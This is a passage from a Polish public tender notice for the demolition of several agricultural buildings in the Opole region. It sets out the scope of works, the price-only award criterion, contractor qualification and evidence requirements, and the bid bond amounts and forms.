umowie) za wykonanie zamówienia,<br/>	pozostałe informacje o przedmiocie umowy zostały zawarte w projektowanych postanowieniach umowy – załącznik nr 3A do wniosku,<br/><br/>5.	Wykonawca zobowiązany jest do zakupu materiałów z rozbiórki po cenie: 39.458,80 zł netto plus VAT, zgodnie z wyceną materiałów – załącznik nr 10/2 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">31 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty na zadania nr 1 - 6 zamawiający będzie się kierował kryterium najniższej ceny. Porównywaną ceną będzie cena brutto za realizację zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie częściowe nr 3: Rozbiórka wiaty nr inw. 18_180B w miejscowości Nowy Dwór przysiółku Kowalowic na dz. Nr. 3 obręb Kowalowice, gmina Namysłów, powiat namysłowski.<br/>1.	Ogólny zakres robót obejmuje, w szczególności:<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	rozbiórka pokrycia dachowego z onduliny drugiej warstwy z papy,<br/>	rozbiórka konstrukcji dachowej wraz z konstrukcją wsporczą i deskowaniem,<br/>	rozebranie bloków betonowych,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych,<br/>	utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>2.	Szczegółowy zakres robót został opisany w:<br/>	projekcie budowlanym rozbiórki – załącznik nr 7/3 do swz,<br/>	specyfikacji technicznej wykonania i odbioru robót budowlanych (stwiorb) - załącznik nr 6/3 do swz,<br/>	przedmiarze robót, (przedmiar robót należy traktować jako dokument informacyjny – załącznik nr 8/3 do swz,<br/>Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych w przedmiarze robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej umowie) za wykonanie zamówienia,<br/>	pozostałe informacje o przedmiocie umowy zostały zawarte w projektowanych postanowieniach umowy – załącznik nr 3B do wniosku,<br/><br/>3.	Wykonawca zobowiązany jest do zakupu materiałów z rozbiórki po cenie: 1.667,80 zł netto plus VAT, zgodnie z wyceną materiałów – załącznik nr 10/3 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">26 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty na zadania nr 1 - 6 zamawiający będzie się kierował kryterium najniższej ceny. Porównywaną ceną będzie cena brutto za realizację zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie częściowe nr 4: Rozbiórka ruin stodoły nr inw. 74_180B w Dobiercicach przy ul. Parkowej, dz. 16/12 obręb Dobiercice, gmina Byczyna, powiat kluczborski.<br/>1.	Ogólny zakres robót obejmuje, w szczególności:<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>2.	Szczegółowy zakres robót został opisany w:<br/>	projekcie zagospodarowania terenu – załącznik nr 9/4 do swz,<br/>	specyfikacji technicznej wykonania i odbioru robót budowlanych (stwiorb) - załącznik nr 6/4 do swz,<br/>	przedmiarze robót, (przedmiar robót należy traktować jako dokument informacyjny – załącznik nr 8/4 do swz,<br/>Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych w przedmiarze robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej umowie) za wykonanie zamówienia,<br/>	pozostałe informacje o przedmiocie umowy zostały zawarte w projektowanych postanowieniach umowy – załącznik nr 3B do wniosku,<br/>	<br/>3.	Wykonawca zobowiązany jest do zakupu materiałów z rozbiórki po cenie: 4.616,66 zł netto plus VAT, zgodnie z wyceną materiałów – załącznik nr 10/4 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">29 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty na zadania nr 1 - 6 zamawiający będzie się kierował kryterium najniższej ceny. Porównywaną ceną będzie cena brutto za realizację zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie częściowe nr 5: Rozbiórka budynku stolarni nr inw. 108/001521*, stodoły nr inw. 108/001522*, garażu z dobudówką nr inw. 102/000055* w Woskowicach Górnych 34A, dz. 16/5 obręb Woskowice Górne, gmina Domaszowice, powiat namysłowski.<br/><br/>1.	Ogólny zakres robót obejmuje, w szczególności:<br/>A) Stolarnia<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu odcinkowego nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>B) Garaż z przybudówką<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie stropu odcinkowego nad przyziemiem,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>C) Stodoła<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	demontaż pokrycia dachowego,<br/>	demontaż konstrukcji dachowej,<br/>	rozebranie ścian – rozbiórka ostrożna z uwagi na sąsiadujące obiekty,<br/>	rozkucie posadzki, odkopanie fundamentów na głębokość ich spodu i szerokość ok. 1,0m,<br/>	rozbicie elementów fundamentowych na bryły wraz z ich wydobyciem i wywiezieniem z miejsca prowadzonych prac, wraz z rozebraniem stropu nad piwnicą,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych będących własnością wykonawcy z terenu rozbiórki oraz utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>2.	Szczegółowy zakres robót został opisany w:<br/>	projekcie zagospodarowania terenu – załącznik nr 9/5 do swz,<br/>	specyfikacji technicznej wykonania i odbioru robót budowlanych (stwiorb) - załącznik nr 6/5 do swz,<br/>	przedmiarze robót, (przedmiar robót należy traktować jako dokument informacyjny – załącznik nr 8/5 do swz,<br/>Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych w przedmiarze robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej umowie) za wykonanie zamówienia,<br/>	pozostałe informacje o przedmiocie umowy zostały zawarte w projektowanych postanowieniach umowy – załącznik nr 3A do wniosku,<br/><br/>3.	Wykonawca zobowiązany jest do zakupu materiałów z rozbiórki po cenie: 11.471,94 zł netto plus VAT, zgodnie z wyceną materiałów – załącznik nr 10/5 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty na zadania nr 1 - 6 zamawiający będzie się kierował kryterium najniższej ceny. Porównywaną ceną będzie cena brutto za realizację zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie częściowe nr 6: Rozbiórka magazynu nawozów nr inw. 726_131 w Rożnowie, dz. 48/32 obręb Rożnów, gmina Wołczyn, powiat kluczborski.<br/><br/>1.	Ogólny zakres robót obejmuje, w szczególności:<br/>	przygotowanie terenu i jego oznakowanie,<br/>	przygotowanie miejsca do składowania materiałów rozbiórkowych,<br/>	rozbiórka pokrycia dachowego (azbest),<br/>	rozbiórka konstrukcji dachowej,<br/>	demontaż posadzki betonowej,<br/>	przewracanie konstrukcji ścian do środka wraz z ich załadunkiem i wywozem,<br/>	wykonanie wykopu wzdłuż fundamentów o szerokości 1,00 i głębokości 1,00m,<br/>	demontaż fundamentów wraz z ich wydobyciem na zewnątrz, załadunkiem na środki transportu i wywozem,<br/>	zasypanie wykopu wraz z uzupełnieniem objętości po wydobytych fundamentach urobkiem gruntowym (nie gruzem) wraz z jego zagęszczeniem,<br/>	uporządkowanie terenu,<br/>	usunięcie materiałów porozbiórkowych,<br/>	utylizacja materiałów niebezpiecznych,<br/>	wykonanie inwentaryzacji geodezyjnej powykonawczej oraz zgłoszenie zmian ewidencyjnych do właściwego Starostwa Powiatowego.<br/><br/>2.	Szczegółowy zakres robót został opisany w:<br/>	projekcie budowlanym rozbiórki – załącznik nr 7/6 do swz,<br/>	specyfikacji technicznej wykonania i odbioru robót budowlanych (stwiorb) - załącznik nr 6/6 do swz,<br/>	przedmiarze robót, (przedmiar robót należy traktować jako dokument informacyjny – załącznik nr 8/6 do swz,<br/>Zamawiający zastrzega, że ewentualne różnice między zakresem i ilością robót określonych w przedmiarze robót, a zakresem i ilością robót rzeczywiście wykonanych nie będą skutkować zmianą ceny ryczałtowej (określonej w ofercie i zawartej umowie) za wykonanie zamówienia,<br/>	pozostałe informacje o przedmiocie umowy zostały zawarte w projektowanych postanowieniach umowy – załącznik nr 3A do wniosku,<br/><br/>3.	Wykonawca zobowiązany jest do zakupu materiałów z rozbiórki po cenie: 4.904,01 zł netto plus VAT, zgodnie z wyceną materiałów – załącznik nr 10/6 do swz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty na zadania nr 1 - 6 zamawiający będzie się kierował kryterium najniższej ceny. Porównywaną ceną będzie cena brutto za realizację zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, w szczególności: zdolności technicznej lub zawodowej. Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że osoby, które będą skierowane do realizacji zamówienia publicznego legitymują się kwalifikacjami zawodowymi, uprawnieniem, odpowiednimi do funkcji, jakie zostaną im powierzone, tj.: osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jego złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>a.	w przypadku powoływania się przez Wykonawcę na podmiot udostępniający zasoby, Wykonawca składa podmiotowy środek dowodowy o którym mowa pkt 1), 2) i 3) dot. tego podmiotu, w celu wykazania że nie podlega on wykluczeniu na podstawie art. 109 ust. 1 pkt 1 i 4 ustawy,<br/>b. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument, o którym mowa w pkt 1), 2) i 3) składa każdy z nich.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób (załącznik nr 4 do SWZ), skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, w celu spełnienia warunku udziału <br/>w postępowaniu, o którym mowa w rozdziale VIII ust. 8.1. pkt 1) SWZ, tj. osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności konstrukcyjno – budowlanej bez ograniczeń.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, w celu spełnienia warunku udziału <br/>w postępowaniu - wzór zobowiązania stanowi załącznik nr 5 do SWZ.<br/>2)	oświadczenie wynikające z art. 117 ust 4 ustawy Pzp, o którym mowa w rozdziale VIII ust. 8.2 pkt 3) SWZ - w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - wzór oświadczenia stanowi załącznik nr 9 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 18.1.	Zamawiający żąda wniesienia wadium w wysokości: <br/>1)	Zadanie częściowe nr 1: 180,00 PLN (słownie: sto osiemdziesiąt złotych);<br/>2)	Zadanie częściowe nr 2: 5.100,00 PLN (słownie: pięć tysięcy sto złotych);<br/>3)	Zadanie częściowe nr 3: 470,00 PLN (słownie: czterysta siedemdziesiąt złotych);<br/>4)	Zadanie częściowe nr 4: 570,00 PLN (słownie: pięćset siedemdziesiąt złotych);<br/>5)	Zadanie częściowe nr 5: 2.990,00 PLN (słownie: dwa tysiące dziewięćset dziewięćdziesiąt złotych);<br/>6)	Zadanie częściowe nr 6: 550,00 PLN (słownie: pięćset pięćdziesiąt złotych);<br/>18.2.	Wadium należy wnieść przed upływem terminu składania ofert (tj. przed upływem dnia <br/>i godziny wyznaczonej jako ostateczny termin składania ofert) i utrzymać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>18.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	w pieniądzu – wyłącznie przelewem - na rachunek bankowy KOWR OT w Opolu, <br/>w Banku Gospodarstwa Krajowego Oddział Opole<br/>numer rachunku 43 1130 1219 0026 3116 1420 0002<br/>z tytułem przelewu &#34;Wadium – rozbiórki OP.WO.ZP.13.2025.RB zadanie nr…. &#34;.<br/>2)	w gwarancjach bankowych;<br/>3)	w gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2024 r. poz. 419 z p.zm.).<br/>18.4.	Wadium wnoszone w pieniądzu, zostanie uznane jako wniesione, jeżeli zostanie zaksięgowane przez Bank na rachunku, o którym mowa w ust. 18.3 pkt 1 przed upływem terminu składania ofert. <br/>18.5.	W przypadku, gdy Wykonawca wnosi wadium w formach określonych w ust. 18.3. pkt 2-4 tj. gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniach, treść tych dokumentów musi spełniać co najmniej następujące wymogi: <br/>1)	Wskazywać gwaranta lub poręczyciela (nazwa podmiotu udzielającego gwarancji lub poręczenia),<br/>2)	Wskazywać beneficjenta tj. Krajowy Ośrodek Wsparcia Rolnictwa Oddział Terenowy <br/>w Opolu, <br/>3)	Określać kwotę poręczenia lub gwarancji w złotych (musi być równa kwocie wadium),<br/>4)	Określać termin ważności gwarancji lub poręczenia (nie może być krótszy niż termin związania ofertą),<br/>5)	Określać przedmiot gwarancji lub poręczenia (wynikający z SWZ),<br/>6)	Wskazywać przyczyny zatrzymania wadium przez Zamawiającego, określone w art. 98 ust. 6 ustawy Pzp,<br/>7)	Musi zawierać klauzule gwarantujące bezwarunkową wypłatę na rzecz Zamawiającego w przypadku wystąpienia okoliczności wymienionych w art. 98 ust. 6 ustawy Pzp, tj. być gwarancją nieodwołalną, bezwarunkową, płatną na pierwsze żądanie do wypłaty Zamawiającego,<br/>8)	Wadium wniesione w formie gwarancji lub poręczenia, o których mowa w ust. 18.3. pkt 2-4 nie może zawierać żadnych ograniczeń sprzecznych z ustawą Pzp, w szczególności ograniczenia przyczyn zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy Pzp<br/>18.6.	Wadium w formie poręczeń lub gwarancji, o których mowa w ust. 18.3. pkt 2-4, Wykonawca przekazuje Zamawiającemu przed upływem terminu składania ofert w oryginale w postaci elektronicznej.<br/>18.7.	Zamawiający odrzuca ofertę, jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp. <br/>18.8.	Zasady dotyczące zwrotu oraz okoliczności zatrzymania wadium określone zostały w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA:<br/>10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty, przez dwa lub więcej podmiotów), pod warunkiem, że taka oferta będzie spełniać następujące wymagania: <br/>1)	Wykonawcy wspólnie ubiegający się o zamówienie, zgodnie z art. 58 ust 2 ustawy Pzp muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą 